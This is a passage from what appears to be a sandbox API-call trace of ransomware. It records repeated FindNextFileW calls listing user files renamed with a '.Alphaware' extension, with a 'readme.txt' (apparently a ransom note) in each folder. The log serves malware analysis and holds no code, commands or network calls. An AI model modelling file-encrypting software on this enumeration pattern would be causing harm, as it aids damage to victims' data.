hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x823fa1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x156c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.xls.Alphaware", cAlternateFileName="MVPQXL~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x8246c600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13108, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf.Alphaware", cAlternateFileName="MXWMXP~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x82492760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e48, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.png.Alphaware", cAlternateFileName="OAAQQJ~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0x824dea20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15bf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OYZWN3-fBul2M9U.wav.Alphaware", cAlternateFileName="OYZWN3~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0x8252ace0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5074, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv.Alphaware", cAlternateFileName="PYDVQX~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814cd5a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x814cd5a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x814cd5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0x8259d100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv.Alphaware", cAlternateFileName="RMPQAV~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0x825c3260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.xls.Alphaware", cAlternateFileName="S4XZHJ~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0x82d7f9e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA", cAlternateFileName="UKLSVP~1")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x8260f520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vjc3e20l.jpg.Alphaware", cAlternateFileName="VJC3E2~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0x8265b7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x189b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.png.Alphaware", cAlternateFileName="VXBET5~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x826a7aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wd6KHPvLn hvANgS.mp3.Alphaware", cAlternateFileName="WD6KHP~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0x82719ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.pps.Alphaware", cAlternateFileName="WQTDEE~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 1 [0081.951] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 0 [0081.951] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0x82d7f9e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0x827b2440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.odt.Alphaware", cAlternateFileName="-CJ6MV~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0x82824860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv.Alphaware", cAlternateFileName="1BM5_1~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0x82870b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fj0H-XEEG0GP.flv.Alphaware", cAlternateFileName="FJ0H-X~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0x828bcde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x165f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.doc.Alphaware", cAlternateFileName="GRD5C_~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x829090a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.png.Alphaware", cAlternateFileName="IOUNPP~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x82955360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jc7CE.wav.Alphaware", cAlternateFileName="JC7CEW~1.ALP")) returned 1 [0081.952] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0x829ed8e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kmo_0PpyMcbzk.m4a.Alphaware", cAlternateFileName="KMO_0P~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x82c75040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x848, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv.Alphaware", cAlternateFileName="ONRPSA~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x82cc1300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d34, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.xlsx.Alphaware", cAlternateFileName="QS1ESA~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827d85a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x827d85a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x827d85a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x82d0d5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1df08, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.ppt.Alphaware", cAlternateFileName="SJIEHW~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x82d33720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x199f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.bmp.Alphaware", cAlternateFileName="Z3ZXFX~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 1 [0081.953] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0081.953] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0081.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0081.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0081.955] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0x82d7f9e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ceff40, ftCreationTime.dwHighDateTime=0x1d97157, ftLastAccessTime.dwLowDateTime=0xd09f55f0, ftLastAccessTime.dwHighDateTime=0x1d97427, ftLastWriteTime.dwLowDateTime=0x827b2440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.odt.Alphaware", cAlternateFileName="-CJ6MV~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa54100, ftCreationTime.dwHighDateTime=0x1d969ac, ftLastAccessTime.dwLowDateTime=0xf4a8ece0, ftLastAccessTime.dwHighDateTime=0x1d96b99, ftLastWriteTime.dwLowDateTime=0x82824860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv.Alphaware", cAlternateFileName="1BM5_1~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5d9440, ftCreationTime.dwHighDateTime=0x1d97056, ftLastAccessTime.dwLowDateTime=0xad82b670, ftLastAccessTime.dwHighDateTime=0x1d97346, ftLastWriteTime.dwLowDateTime=0x82870b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fj0H-XEEG0GP.flv.Alphaware", cAlternateFileName="FJ0H-X~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0ecb90, ftCreationTime.dwHighDateTime=0x1d96f36, ftLastAccessTime.dwLowDateTime=0xd356be60, ftLastAccessTime.dwHighDateTime=0x1d97322, ftLastWriteTime.dwLowDateTime=0x828bcde0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x165f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.doc.Alphaware", cAlternateFileName="GRD5C_~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572ee5c0, ftCreationTime.dwHighDateTime=0x1d96cd7, ftLastAccessTime.dwLowDateTime=0x5fa6c0a0, ftLastAccessTime.dwHighDateTime=0x1d9720f, ftLastWriteTime.dwLowDateTime=0x829090a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.png.Alphaware", cAlternateFileName="IOUNPP~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0c78100, ftCreationTime.dwHighDateTime=0x1d96bf5, ftLastAccessTime.dwLowDateTime=0x31ce380, ftLastAccessTime.dwHighDateTime=0x1d97144, ftLastWriteTime.dwLowDateTime=0x82955360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jc7CE.wav.Alphaware", cAlternateFileName="JC7CEW~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb0ef00, ftCreationTime.dwHighDateTime=0x1d96bca, ftLastAccessTime.dwLowDateTime=0xed24a8e0, ftLastAccessTime.dwHighDateTime=0x1d96df8, ftLastWriteTime.dwLowDateTime=0x829ed8e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kmo_0PpyMcbzk.m4a.Alphaware", cAlternateFileName="KMO_0P~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf43bd8d0, ftCreationTime.dwHighDateTime=0x1d974d1, ftLastAccessTime.dwLowDateTime=0x482b21f0, ftLastAccessTime.dwHighDateTime=0x1d97575, ftLastWriteTime.dwLowDateTime=0x82c75040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x848, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnrpsaEkvylzPJqZCM2l.mkv.Alphaware", cAlternateFileName="ONRPSA~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83554ad0, ftCreationTime.dwHighDateTime=0x1d96e59, ftLastAccessTime.dwLowDateTime=0x72c43140, ftLastAccessTime.dwHighDateTime=0x1d9747b, ftLastWriteTime.dwLowDateTime=0x82cc1300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d34, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs1EsaM6mnJQuW3k.xlsx.Alphaware", cAlternateFileName="QS1ESA~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827d85a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x827d85a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x827d85a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x82d0d5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1df08, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.ppt.Alphaware", cAlternateFileName="SJIEHW~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x82d33720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x199f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.bmp.Alphaware", cAlternateFileName="Z3ZXFX~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, 